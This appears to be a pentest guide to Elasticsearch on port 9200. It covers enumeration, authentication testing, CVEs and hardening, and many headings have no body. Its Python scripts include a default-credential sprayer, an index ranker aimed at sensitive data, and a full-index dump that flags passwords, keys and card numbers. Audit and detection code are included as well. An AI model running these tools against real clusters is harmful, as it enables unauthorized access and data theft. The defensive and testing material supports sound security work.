Elasticsearch - Port 9200

Basic info

What is Elasticsearch?

Elasticsearch is a distributed search and analytics engine built on Apache Lucene. It stores schema-flexible JSON documents and is widely used as a NoSQL document store. It provides:

  • Full-text search - Fast, powerful search capabilities

  • Real-time indexing - Near-instant data availability

  • Horizontal scalability - Add nodes seamlessly

  • RESTful API - Simple HTTP/JSON interface

  • Multi-tenancy - Multiple indices per cluster

  • Aggregations - Analytics and data insights

The Elastic Stack (ELK)

Components:

  • Beats - Lightweight data shippers

  • Logstash - Data processing pipeline

  • Elasticsearch - Search and analytics engine

  • Kibana - Visualization and management UI

Data Model

Key Concepts:

  • Cluster - Collection of nodes

  • Node - Single Elasticsearch instance

  • Index - Collection of related documents

  • Document - JSON object with data

  • Shard - Subset of an index

  • Replica - Copy of a shard for redundancy

Inverted Index

Elasticsearch uses an inverted index for fast search: at index time each document's text is split into terms, and the index maps every term to the list of documents (and positions) that contain it. A query is then a lookup of its terms and an intersection of the matching document lists, not a scan of every document.

Use Cases

Real-World Deployments:

  • Netflix - Search infrastructure

  • LinkedIn - Job search and recommendations

  • Uber - Customer support and analytics

  • GitHub - Code search

  • eBay - Product search

  • Stack Overflow - Q&A search

Common Applications:

  • Log aggregation and analysis

  • Application search

  • Security information and event management (SIEM)

  • Business analytics

  • Metrics and monitoring

  • Geospatial data analysis

Default Port

Port 9200 - Elasticsearch HTTP API (plain HTTP on 7.x and earlier by default; 8.x serves it over TLS with a self-signed certificate written at first start, so probe both http:// and https://)

Additional Ports:

  • 9300 - Transport protocol (node-to-node)

  • 5601 - Kibana web interface

Reconnaissance & Enumeration

Port Scanning

Basic Nmap Scan

Sample Output:

Basic Information

Extract Key Information:

  • Cluster name

  • Node name

  • Elasticsearch version

  • Lucene version

  • Build information

Shodan Queries

Authentication Testing

Check Authentication Status

Unauthenticated Access (the default on 7.x and earlier when xpack.security.enabled is not set; 8.x turns security and TLS on at first start)

Authentication Enabled

Check Security Configuration
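The two checks above (fingerprint from GET / and authentication state) can be done in one request. The following script is an added example, not code from the original page: ES_URL and the sample JSON body are constructed, but the body has the shape a real node returns from GET /, and the status-code mapping is what Elasticsearch actually does (200 open, 401 with WWW-Authenticate when security is enabled, 403 for an anonymous role without privileges).

```python
"""Fingerprint an Elasticsearch node from GET / and classify its auth state.

Added example for this page, not code from it. ES_URL and the sample JSON body
are constructed; the body has the shape a real node returns from GET /.
"""
import base64
import json
import ssl
import urllib.error
import urllib.request
from typing import Dict, Optional

ES_URL = "http://127.0.0.1:9200"  # constructed target

SAMPLE_ROOT = json.dumps({  # constructed, same layout as a real GET / body
    "name": "node-1",
    "cluster_name": "docker-cluster",
    "cluster_uuid": "constructed-uuid",
    "version": {"number": "7.10.2", "build_flavor": "default", "build_type": "docker",
                "build_hash": "constructed", "lucene_version": "8.7.0"},
    "tagline": "You Know, for Search",
})


def parse_root_info(body: str) -> Dict[str, Optional[str]]:
    """Extract the fields worth recording from a GET / body."""
    data = json.loads(body)
    ver = data.get("version", {})
    return {
        "cluster_name": data.get("cluster_name"),
        "node_name": data.get("name"),
        "version": ver.get("number"),
        "lucene_version": ver.get("lucene_version"),
        "build": f"{ver.get('build_flavor')}/{ver.get('build_type')}@{ver.get('build_hash')}",
    }


def classify_auth(status: int, headers: Dict[str, str], body: str = "") -> str:
    """Map the HTTP response of GET / to an authentication state.

    200 + JSON with "tagline"     -> open (no authentication)
    401 + WWW-Authenticate header -> security enabled, credentials required
    403                           -> authenticated (e.g. anonymous role) but not permitted
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status == 401 and "www-authenticate" in hdrs:
        return "auth-required"
    if status == 403:
        return "forbidden"
    if status == 200:
        try:
            data = json.loads(body)
            if isinstance(data, dict) and "tagline" in data:
                return "open"
        except ValueError:
            pass
        return "open-non-es"  # something else answers on the port
    return f"unexpected-{status}"


def probe(url: str = ES_URL, user: Optional[str] = None, password: str = "",
          verify_tls: bool = True, timeout: float = 5.0) -> Dict[str, Optional[str]]:
    """GET / on a live node; returns the auth state plus the fingerprint if readable.

    verify_tls=False is for 8.x nodes still using the self-signed setup certificate.
    """
    ctx = None if verify_tls else ssl._create_unverified_context()
    req = urllib.request.Request(url.rstrip("/") + "/")
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req.add_header("Authorization", f"Basic {token}")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            status, headers, body = resp.status, dict(resp.headers), resp.read().decode()
    except urllib.error.HTTPError as e:
        status, headers, body = e.code, dict(e.headers), e.read().decode(errors="replace")
    state = classify_auth(status, headers, body)
    if user is not None and state == "open":
        state = "authenticated"  # the body was readable only because we sent credentials
    result: Dict[str, Optional[str]] = {"auth": state}
    if state in ("open", "authenticated"):
        result.update(parse_root_info(body))
    return result


if __name__ == "__main__":
    print(probe())
```

Record the version string from the fingerprint; it drives which of the CVEs later on the page are worth testing, and a node that answers "open" on a 7.x build is exposed in exactly the default configuration the page describes.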

Default Credentials

Common Default Users: the built-in users X-Pack creates are elastic (superuser), kibana_system (formerly kibana), logstash_system, beats_system, apm_system and remote_monitoring_user. On 5.x their bootstrap password was changeme; 6.x and 7.x require elasticsearch-setup-passwords to set them, and 8.x prints a random elastic password at first start. A cluster that still accepts elastic:changeme was either set up on 5.x or had the password deliberately reset.

Test Default Credentials: GET /_security/_authenticate with HTTP Basic auth returns 200 and the user's roles when the pair is valid, 401 otherwise.

Brute Force Authentication

Using Hydra

Custom Python Script
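Hydra's http-get module works against /_security/_authenticate, but a small script makes the back-off and audit-log considerations explicit. The following is an added example, not the page's own script: BUILTIN_USERS are the accounts X-Pack really creates, PASSWORDS is a constructed list, and the fake authenticator used in the test stands in for a live node.

```python
"""Spray the built-in Elasticsearch users with a short password list.

Added example, not the page's own brute-force script. BUILTIN_USERS are the
accounts X-Pack creates; PASSWORDS is a constructed starting list.
"""
import base64
import itertools
import ssl
import time
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

BUILTIN_USERS = ["elastic", "kibana_system", "kibana", "logstash_system",
                 "beats_system", "apm_system", "remote_monitoring_user"]
# "changeme" was the 5.x default; the rest are constructed common guesses.
PASSWORDS = ["changeme", "elastic", "password", "elasticsearch", "kibana", "admin"]


def basic_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def live_authenticator(base_url: str, verify_tls: bool = True,
                       timeout: float = 5.0) -> Callable[[str, str], int]:
    """Return a function reporting the HTTP status of GET /_security/_authenticate."""
    ctx = None if verify_tls else ssl._create_unverified_context()
    url = base_url.rstrip("/") + "/_security/_authenticate"

    def attempt(user: str, password: str) -> int:
        req = urllib.request.Request(url, headers={"Authorization": basic_header(user, password)})
        try:
            with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
                return resp.status
        except urllib.error.HTTPError as e:
            return e.code
    return attempt


def spray(attempt: Callable[[str, str], int], users: Iterable[str] = BUILTIN_USERS,
          passwords: Iterable[str] = PASSWORDS, delay: float = 0.0,
          stop_on_first: bool = False) -> List[Tuple[str, str]]:
    """Return the (user, password) pairs that authenticated.

    200 = valid; 401 = wrong password (or a disabled account); 429 or 5xx = the
    node is throttling or struggling, so back off. Every failure lands in the
    audit log as authentication_failed, which is why the list is short and a
    delay between attempts is supported.
    """
    found = []
    for user, password in itertools.product(list(users), list(passwords)):
        status = attempt(user, password)
        if status == 200:
            found.append((user, password))
            if stop_on_first:
                break
        elif status == 429 or status >= 500:
            time.sleep(max(delay, 1.0) * 5)
        if delay:
            time.sleep(delay)
    return found


if __name__ == "__main__":
    # Live use (constructed target): spray(live_authenticator("https://10.0.0.5:9200", verify_tls=False), delay=0.5)
    fake_valid = {("elastic", "changeme")}
    print(spray(lambda u, p: 200 if (u, p) in fake_valid else 401))
```

Elasticsearch has no built-in lockout, so the limiting factor is detection rather than the node refusing attempts; a burst of authentication_failed events for several built-in users from one address is exactly what a defender's audit-log rule should key on.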

Enumeration Techniques

Cluster Information

Basic Cluster Info

Node Information

Index Enumeration

List All Indices

Index Details

User & Role Enumeration

List Users (If Auth Enabled)

List Roles

List Privileges

API Endpoint Discovery

Cat APIs (Administrative)
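GET /_cat/indices?v is usually the first call after a node turns out to be open; it lists every index with document counts and on-disk size, which is enough to decide where to look first. The following parser and ranking is an added example, not code from the original page; the table is constructed in the format the _cat API emits with ?v, and the "interesting name" regex is a constructed starting set.

```python
"""Parse GET /_cat/indices?v output and rank indices by likely value.

Added example, not from the original page. SAMPLE_CAT_INDICES is constructed in
the layout the _cat API prints with ?v; the uuids are placeholders.
"""
import re
from typing import Dict, List

SAMPLE_CAT_INDICES = """\
health status index                uuid                   pri rep docs.count docs.deleted store.size pri.store.size
green  open   .security-7          4mJ5Y1wdRxmdn6PA4r1CkA   1   0          7            0     25.8kb         25.8kb
yellow open   users                a1B2c3D4e5F6g7H8i9J0kL   1   1      15230           12      4.1mb          4.1mb
yellow open   logs-2024.01.15      ZzYyXxWwVvUuTtSsRrQqPp   1   1    2097152            0      1.2gb          1.2gb
green  open   .kibana_7.10.2_001   b7c8d9e0f1g2h3i4j5k6l7   1   0         42            3    112.4kb        112.4kb
yellow open   payment-transactions Pp0Oo9Ii8Uu7Yy6Tt5Rr4E   1   1     880000           15    640.5mb        640.5mb
"""

SIZE_UNITS = {"b": 1, "kb": 1024, "mb": 1024 ** 2, "gb": 1024 ** 3, "tb": 1024 ** 4}
# Constructed list of name fragments that tend to mark data worth reading first.
INTERESTING = re.compile(r"user|account|cred|pass|secret|token|payment|card|customer|pii|session|\.security", re.I)


def parse_cat_table(text: str) -> List[Dict[str, str]]:
    """Turn a ?v table into dicts keyed by the header row.

    Rows with a different column count (e.g. a red index with no doc count) are skipped.
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split()
    rows = []
    for line in lines[1:]:
        cells = line.split()
        if len(cells) == len(header):
            rows.append(dict(zip(header, cells)))
    return rows


def size_to_bytes(s: str) -> int:
    """'1.2gb' -> bytes; unknown units are treated as bytes."""
    m = re.fullmatch(r"([\d.]+)([a-z]+)", s.strip().lower())
    if not m:
        return 0
    return int(float(m.group(1)) * SIZE_UNITS.get(m.group(2), 1))


def rank_indices(text: str) -> List[Dict[str, object]]:
    """Likely-sensitive indices first, then the rest, each group ordered by document count."""
    ranked = []
    for row in parse_cat_table(text):
        name = row["index"]
        ranked.append({
            "index": name,
            "docs": int(row["docs.count"]),
            "bytes": size_to_bytes(row["store.size"]),
            "system": name.startswith("."),   # .security, .kibana, ... (hidden/system indices)
            "interesting": bool(INTERESTING.search(name)),
        })
    ranked.sort(key=lambda r: (not r["interesting"], -r["docs"]))
    return ranked


if __name__ == "__main__":
    for r in rank_indices(SAMPLE_CAT_INDICES):
        print(f"{r['index']:<22} docs={r['docs']:>8} bytes={r['bytes']:>12} system={r['system']}")
```

Appending ?format=json to any _cat call returns the same data as JSON and avoids the parsing step; the text parser is for output captured from curl or from someone else's notes. The .security index is worth a special look: on an open 6.x/7.x cluster with security disabled it will not exist, but on a cluster where you hold a superuser it contains the hashed native-realm passwords and role mappings.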

Data Exfiltration

Search and Dump Data

Basic Search

Query DSL (Domain Specific Language)

Regex Search

Dump Entire Index

Method 1: Simple GET Request

Method 2: Scroll API (Large Datasets)

Method 3: Export with Elasticsearch Dump

Dump All Indices

Search for Sensitive Data

Common Sensitive Fields
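The scroll API (Method 2 above) and the search for sensitive fields fit together: page through the index once, inspect each _source as it arrives, and release the scroll context when done. The script below is an added example, not code from the original page. ScrollClient is a minimal HTTP transport; FakeClient replays constructed responses so the flow can be run offline; the field-name and value patterns are a constructed starting set, not a standard list.

```python
"""Dump an index with the scroll API and flag documents that look like they hold secrets.

Added example, not from the original page. FakeClient and its documents are
constructed; the scroll request/response shapes match the real API.
"""
import json
import re
import ssl
import urllib.request
from typing import Any, Dict, Iterator, List, Optional


class ScrollClient:
    def __init__(self, base_url: str, auth_header: Optional[str] = None, verify_tls: bool = True):
        self.base, self.auth = base_url.rstrip("/"), auth_header
        self.ctx = None if verify_tls else ssl._create_unverified_context()

    def request(self, method: str, path: str, body: Optional[dict] = None) -> dict:
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(self.base + path, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        if self.auth:
            req.add_header("Authorization", self.auth)
        with urllib.request.urlopen(req, timeout=30, context=self.ctx) as resp:
            return json.loads(resp.read().decode())


def scroll_index(client, index: str, query: Optional[dict] = None,
                 page_size: int = 1000, keep_alive: str = "1m") -> Iterator[Dict[str, Any]]:
    """Yield every hit in `index`; sorting on _doc is the cheapest order for a full scan."""
    body = {"size": page_size, "query": query or {"match_all": {}}, "sort": ["_doc"]}
    resp = client.request("POST", f"/{index}/_search?scroll={keep_alive}", body)
    scroll_id = resp.get("_scroll_id")
    try:
        while True:
            hits = resp.get("hits", {}).get("hits", [])
            if not hits:
                break
            yield from hits
            resp = client.request("POST", "/_search/scroll", {"scroll": keep_alive, "scroll_id": scroll_id})
            scroll_id = resp.get("_scroll_id", scroll_id)
    finally:
        if scroll_id:  # free the server-side context instead of waiting for keep_alive to expire
            client.request("DELETE", "/_search/scroll", {"scroll_id": scroll_id})


FIELD_RE = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|ssn|credit|card|private[_-]?key", re.I)
VALUE_RES = {  # constructed value shapes worth a second look
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "bcrypt_hash": re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}"),
    "card_like": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}


def find_sensitive(doc: Dict[str, Any], prefix: str = "") -> List[str]:
    """Walk a (possibly nested) _source and return 'path: reason' findings."""
    findings = []
    for key, val in doc.items():
        path = f"{prefix}.{key}" if prefix else key
        if isinstance(val, dict):
            findings.extend(find_sensitive(val, path))
            continue
        if FIELD_RE.search(key):
            findings.append(f"{path}: field name")
        if isinstance(val, str):
            for label, rx in VALUE_RES.items():
                if rx.search(val):
                    findings.append(f"{path}: value looks like {label}")
    return findings


def dump_and_scan(client, index: str) -> Dict[str, Any]:
    """Return the document count and a map of _id -> findings for flagged documents."""
    count, flagged = 0, {}
    for hit in scroll_index(client, index):
        count += 1
        found = find_sensitive(hit.get("_source", {}))
        if found:
            flagged[hit["_id"]] = found
    return {"count": count, "flagged": flagged}


class FakeClient:
    """Replays constructed scroll responses: two pages of hits, then an empty page."""

    def __init__(self):
        self.calls: List[tuple] = []
        self.pages = [
            {"_scroll_id": "s1", "hits": {"hits": [
                {"_id": "1", "_source": {"user": "alice", "password": "$2b$12$" + "a" * 53}},
                {"_id": "2", "_source": {"user": "bob", "note": "prod key AKIAABCDEFGHIJKLMNOP"}}]}},
            {"_scroll_id": "s1", "hits": {"hits": [
                {"_id": "3", "_source": {"order": {"card": "4111 1111 1111 1111"}, "total": 12.5}},
                {"_id": "4", "_source": {"event": "login ok"}}]}},
            {"_scroll_id": "s1", "hits": {"hits": []}},
        ]

    def request(self, method, path, body=None):
        self.calls.append((method, path))
        return {"succeeded": True} if method == "DELETE" else self.pages.pop(0)
```

Against a live node use `dump_and_scan(ScrollClient("https://host:9200", "Basic ...", verify_tls=False), "users")`. Scroll contexts hold segment files open on the node, so `keep_alive` should be just long enough to process one page; on 7.10+ a point-in-time (`_pit`) with `search_after` is the lighter-weight alternative for the same full scan. The same `find_sensitive` walker can be pointed at a Query DSL hit set instead of a full dump by passing a `query` such as `{"query_string": {"query": "password OR secret OR token"}}`.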

Exploitation Techniques

Unauthorized Data Modification

Create Index

Insert Document

Update Document

Delete Data

Code Execution via Scripts

Groovy Scripts (Elasticsearch 1.4.x to 2.x)

Groovy replaced MVEL as the default scripting language in 1.4 and stayed until Painless took over in 5.0 (Groovy was removed in 6.0). After CVE-2015-1427 dynamic Groovy is off by default (1.3.8 / 1.4.3 onward), so script execution on those versions depends on the operator having re-enabled inline scripts through the script.* settings.

Painless Scripts (Elasticsearch >= 5.0)

Painless is sandboxed by design: scripts can read and transform document fields (for example via _update_by_query or script_fields) but have no access to Runtime, reflection or the file system. On a patched node a Painless script means data tampering and exfiltration, not OS command execution.

Known Vulnerabilities & CVEs

CVE-2014-3120: Remote Code Execution (MVEL dynamic scripting)

Affected: Elasticsearch < 1.2.0 (dynamic scripting enabled by default, MVEL as the default script language)

Exploitation: a _search request with a script_fields entry whose MVEL script reaches java.lang.Runtime runs commands as the elasticsearch user. 1.2.0 disabled dynamic scripting by default, so later 1.x nodes are exposed only if script.disable_dynamic was set back to false.

Metasploit Module: exploit/multi/elasticsearch/script_mvel_rce

CVE-2015-1427: Groovy Sandbox Bypass (Remote Code Execution)

Affected: Elasticsearch 1.3.0 - 1.3.7 and 1.4.0 - 1.4.2 (fixed in 1.3.8 and 1.4.3)

Exploitation: the Groovy sandbox could be escaped through reflection (obtaining a java.lang.Runtime reference via a Class object), again giving command execution as the elasticsearch user. Metasploit Module: exploit/multi/elasticsearch/search_groovy_script

CVE-2021-22145: Memory Disclosure

Affected: Elasticsearch 7.10.0 - 7.13.3

Impact: a malformed query could make the error response include stale contents of a previously used network buffer, so anyone able to submit queries could read fragments of other users' requests. It is an information leak, not a denial of service.

CVE-2023-31419: Denial of Service (stack overflow)

Affected: Elasticsearch 7.0.0 - 7.17.12 and 8.0.0 - 8.9.1

Description: a specially crafted query string sent to the _search API triggers a StackOverflowError and takes the node down. It is a crash bug, not an authentication bypass.

Directory Traversal (Various Versions)

Path Traversal in Snapshot Repository: CVE-2015-5531 (Elasticsearch < 1.6.1) let a remote attacker read arbitrary files through snapshot API calls. Related: CVE-2015-3337 (< 1.4.5 and 1.5.x < 1.5.2), a path traversal in the site-plugin handler that exposed files outside the plugin directory whenever any site plugin was installed.
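Once the version is known from GET /, the CVE list above reduces to a range check. The following is an added example, not code from the original page: the version ranges are the affected/fixed boundaries stated in the vendor advisories for the CVEs listed on this page, and the notes are mine. A match only says the vulnerable code is present; for the scripting bugs the relevant script.* setting decides whether it is reachable.

```python
"""Map a reported Elasticsearch version to the CVEs discussed on this page.

Added example, not from the original page. Bounds are inclusive; 999 as a
patch number stands for "any patch release of that minor".
"""
import re
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]

# (cve, [(first_affected, last_affected), ...], note)
ES_CVES = [
    ("CVE-2014-3120", [((0, 0, 0), (1, 1, 999))],
     "MVEL dynamic scripting RCE; dynamic scripts on by default before 1.2"),
    ("CVE-2015-1427", [((1, 3, 0), (1, 3, 7)), ((1, 4, 0), (1, 4, 2))],
     "Groovy sandbox bypass RCE"),
    ("CVE-2015-3337", [((0, 0, 0), (1, 4, 4)), ((1, 5, 0), (1, 5, 1))],
     "path traversal via site plugins"),
    ("CVE-2015-5531", [((0, 0, 0), (1, 6, 0))],
     "arbitrary file read via snapshot API path traversal"),
    ("CVE-2021-22145", [((7, 10, 0), (7, 13, 3))],
     "memory disclosure in error responses"),
    ("CVE-2023-31419", [((7, 0, 0), (7, 17, 12)), ((8, 0, 0), (8, 9, 1))],
     "stack overflow DoS via crafted _search query string"),
]


def parse_version(s: str) -> Version:
    """'7.10.2' -> (7, 10, 2); suffixes such as '-SNAPSHOT' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", s.strip())
    if not m:
        raise ValueError(f"not an Elasticsearch version: {s!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def applicable_cves(version: str) -> List[Dict[str, str]]:
    """Return the page's CVEs whose affected ranges contain `version`, in list order."""
    v = parse_version(version)
    return [{"cve": cve, "note": note}
            for cve, ranges, note in ES_CVES
            if any(lo <= v <= hi for lo, hi in ranges)]


if __name__ == "__main__":
    for ver in ("1.1.1", "1.4.2", "7.10.2", "8.9.2"):
        print(ver, [c["cve"] for c in applicable_cves(ver)])
```

Feed it the `version.number` from the fingerprint step; an unexpectedly empty list on an old-looking node usually means a distribution build string (for example a vendor fork) rather than a clean bill of health, so confirm the version through /_nodes as well.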

Post-Exploitation

Privilege Escalation

Create Superuser (If Auth Enabled)

Modify User Roles

Persistence

Create API Key

Snapshot Backdoor

Lateral Movement

Extract Configuration

Harvest Credentials from Data

Defense & Hardening

Enable Authentication

elasticsearch.yml Configuration:

Set Strong Passwords:

Role-Based Access Control:

Network Security

Bind to Specific Interface:

Firewall Rules:

Reverse Proxy with Authentication:

Disable Dangerous Features

Disable Scripts (If Not Needed): on 6.0 and later set script.allowed_types: none (or restrict script.allowed_contexts); Kibana and many aggregation and ingest features rely on inline Painless, so confirm nothing needs scripting before turning it off.

Disable Dynamic Scripting: on 1.x set script.disable_dynamic: true (the default from 1.2 onward); this is the setting whose absence made CVE-2014-3120 and CVE-2015-1427 exploitable out of the box.

Limit API Access:
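The hardening settings above live in elasticsearch.yml, and checking a file for them is mechanical. The following auditor is an added example, not Elastic's own tooling: the weak and hardened files are constructed, the parser handles only the flat `key: value` form elasticsearch.yml normally uses (so no PyYAML dependency), and the version-dependent defaults it applies are the documented ones (xpack.security.enabled and action.destructive_requires_name both changed their default to true in 8.0; network.host is loopback when unset).

```python
"""Audit an elasticsearch.yml for the hardening settings discussed on this page.

Added example, not Elastic tooling. Both sample files are constructed.
"""
from typing import Dict, List

WEAK_YML = """\
cluster.name: docker-cluster
network.host: 0.0.0.0
discovery.type: single-node
xpack.security.enabled: false
"""

HARDENED_YML = """\
cluster.name: docker-cluster
network.host: 10.0.5.12          # constructed private address, not 0.0.0.0
discovery.type: single-node
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.transport.ssl.enabled: true
xpack.security.audit.enabled: true
script.allowed_types: none       # only if nothing (including Kibana) needs scripting
action.destructive_requires_name: true
"""


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Parse top-level `key: value` lines; comments, blanks and indented blocks are ignored."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].rstrip()
        if not line or line.startswith((" ", "\t")) or ":" not in line:
            continue
        key, _, val = line.partition(":")
        settings[key.strip()] = val.strip().strip("\"'")
    return settings


def audit_settings(settings: Dict[str, str], version_major: int = 7) -> List[Dict[str, str]]:
    """Return findings as {setting, observed, expected, severity}.

    Absent keys are judged by the version's documented default, which is why
    the major version is a parameter.
    """
    findings = []

    def want(key: str, expected: str, severity: str, default: str = "") -> None:
        observed = settings.get(key, default)
        if observed.lower() != expected:
            findings.append({"setting": key, "observed": observed or "<unset>",
                             "expected": expected, "severity": severity})

    v8 = version_major >= 8
    want("xpack.security.enabled", "true", "critical", "true" if v8 else "false")
    # 8.x writes the ssl keys explicitly at setup, so an absent key is a finding on any version.
    want("xpack.security.http.ssl.enabled", "true", "high")
    want("xpack.security.transport.ssl.enabled", "true", "high")
    want("xpack.security.audit.enabled", "true", "medium")
    want("action.destructive_requires_name", "true", "medium", "true" if v8 else "false")
    want("script.allowed_types", "none", "low")

    host = settings.get("network.host", "127.0.0.1")  # unset binds loopback only
    if host in ("0.0.0.0", "::", "_global_"):
        findings.append({"setting": "network.host", "observed": host,
                         "expected": "loopback or a private-network address", "severity": "high"})
    anon = settings.get("xpack.security.authc.anonymous.roles")
    if anon:  # anonymous access mapped to a role reopens the cluster even with security on
        findings.append({"setting": "xpack.security.authc.anonymous.roles", "observed": anon,
                         "expected": "<unset>", "severity": "high"})
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_YML), ("hardened", HARDENED_YML)):
        print(name, audit_settings(parse_flat_yaml(text)))
```

The script.allowed_types finding is deliberately low severity: it is the right setting when the cluster is a plain log store, and the wrong one under a Kibana instance. Network binding and a firewall on 9200/9300 remain the controls that matter most, because every other setting can be wrong without consequence on a node nobody else can reach.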

Monitoring & Detection

Enable Audit Logging:

Monitor Logs:

Intrusion Detection:
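With xpack.security.audit.enabled set, the node writes one JSON object per event, and the two things worth alerting on first are a burst of authentication_failed events from one address (the spraying described earlier) followed by a privileged security action such as a user or API-key creation (the persistence steps above). The detector below is an added example, not from the original page: the log lines are constructed in the dotted-field JSON layout of the audit log, the timestamp key is accepted under both the `@timestamp` and older `timestamp` names, and the action names are the transport actions the audit log records for those operations.

```python
"""Simple detections over Elasticsearch JSON audit-log lines.

Added example, not from the original page. SAMPLE_AUDIT is constructed;
addresses are documentation ranges.
"""
import json
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

SAMPLE_AUDIT = """\
{"@timestamp":"2024-03-01T10:00:01.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"elastic","origin.address":"198.51.100.7:51000","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:02.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"elastic","origin.address":"198.51.100.7:51001","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:03.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"kibana_system","origin.address":"198.51.100.7:51002","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:04.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"logstash_system","origin.address":"198.51.100.7:51003","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:05.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"beats_system","origin.address":"198.51.100.7:51004","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:09.000Z","event.type":"rest","event.action":"authentication_success","user.name":"elastic","origin.address":"198.51.100.7:51005","url.path":"/","request.method":"GET"}
{"@timestamp":"2024-03-01T10:00:15.000Z","event.type":"transport","event.action":"access_granted","user.name":"elastic","origin.address":"198.51.100.7:51006","action":"cluster:admin/xpack/security/user/put","request.name":"PutUserRequest"}
{"@timestamp":"2024-03-01T10:00:20.000Z","event.type":"transport","event.action":"access_granted","user.name":"elastic","origin.address":"198.51.100.7:51007","action":"cluster:admin/xpack/security/api_key/create","request.name":"CreateApiKeyRequest"}
{"@timestamp":"2024-03-01T10:05:00.000Z","event.type":"rest","event.action":"authentication_failed","user.name":"alice","origin.address":"10.0.0.5:40000","url.path":"/_security/_authenticate","request.method":"GET"}
{"@timestamp":"2024-03-01T10:30:00.000Z","event.type":"transport","event.action":"access_granted","user.name":"svc-logstash","origin.address":"10.0.0.9:40100","action":"indices:data/write/bulk","request.name":"BulkRequest"}
"""

PRIVILEGED_ACTIONS = {
    "cluster:admin/xpack/security/user/put": "user created or modified",
    "cluster:admin/xpack/security/role/put": "role created or modified",
    "cluster:admin/xpack/security/api_key/create": "API key created (persistence)",
    "cluster:admin/repository/put": "snapshot repository registered",
    "indices:admin/delete": "index deleted",
}


def parse_ts(ts: str) -> datetime:
    """Accept '2024-03-01T10:00:01.000Z' and the older '2019-08-29T19:10:29,322+0000' form."""
    ts = ts.replace("Z", "+00:00").replace(",", ".")
    if len(ts) > 5 and ts[-5] in "+-" and ts[-3] != ":":  # +0000 -> +00:00
        ts = ts[:-2] + ":" + ts[-2:]
    return datetime.fromisoformat(ts)


def parse_audit(text: str) -> List[Dict]:
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["_ts"] = parse_ts(ev.get("@timestamp") or ev["timestamp"])
            events.append(ev)
    return events


def source_ip(ev: Dict) -> str:
    return ev.get("origin.address", "?").rsplit(":", 1)[0]


def detect(events: List[Dict], fail_threshold: int = 5, window_s: int = 60) -> List[Dict[str, str]]:
    alerts: List[Dict[str, str]] = []
    # Rule 1: fail_threshold authentication failures from one address inside window_s seconds.
    fails = defaultdict(list)
    for ev in events:
        if ev.get("event.action") == "authentication_failed":
            fails[source_ip(ev)].append(ev)
    for ip, evs in fails.items():
        evs.sort(key=lambda e: e["_ts"])
        for i in range(len(evs) - fail_threshold + 1):
            span = (evs[i + fail_threshold - 1]["_ts"] - evs[i]["_ts"]).total_seconds()
            if span <= window_s:
                users = sorted({e.get("user.name", "?") for e in evs[i:i + fail_threshold]})
                alerts.append({"rule": "auth-bruteforce", "source": ip, "severity": "high",
                               "detail": f"{fail_threshold} failures in {span:.0f}s for users {users}"})
                break
    spray_ips = {a["source"] for a in alerts}
    # Rule 2: privileged security/admin actions, critical when the source was just spraying.
    for ev in events:
        reason = PRIVILEGED_ACTIONS.get(ev.get("action", ""))
        if reason and ev.get("event.action") == "access_granted":
            ip = source_ip(ev)
            alerts.append({"rule": "privileged-action", "source": ip,
                           "severity": "critical" if ip in spray_ips else "medium",
                           "detail": f"{ev.get('user.name')}: {reason} ({ev['action']})"})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_audit(SAMPLE_AUDIT)):
        print(a["severity"], a["rule"], a["source"], a["detail"])
```

The constructed log tells the story the page's attack chain would leave behind: five failures across built-in users in four seconds, a success as elastic, then a PUT user and an API-key creation from the same address. Extend PRIVILEGED_ACTIONS with the actions your cluster never performs in normal operation (snapshot creation to a new repository, role mapping changes) and ship the alerts to whatever the rest of the SIEM uses.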

Regular Security Practices

Tools & Scripts

Essential Tools

  1. curl - HTTP API interaction

  2. elasticdump - Data export tool

  3. Metasploit - Exploitation framework

  4. esearch - Elasticsearch CLI

  5. jq - JSON parsing

Python Enumeration Script

Cheat Sheet

Quick Reference

Important Endpoints

Default Credentials

Conclusion

Elasticsearch, designed for speed and simplicity, historically shipped with no authentication: on 7.x and earlier security stays off unless xpack.security.enabled is set, and only 8.x turns security and TLS on at first start. The combination of no authentication, powerful REST APIs, and rich data makes exposed Elasticsearch instances extremely valuable targets.

Key Takeaways:

  1. Enable X-Pack security - Never run without authentication (the security features are free since 6.8/7.1 and on by default from 8.0)

  2. Change default credentials - elastic:changeme (the 5.x default) is widely known; set a password for every built-in user, not just elastic

  3. Network segmentation - Bind to localhost or private network

  4. Enable SSL/TLS - Encrypt all communications

  5. Implement RBAC - Least privilege access

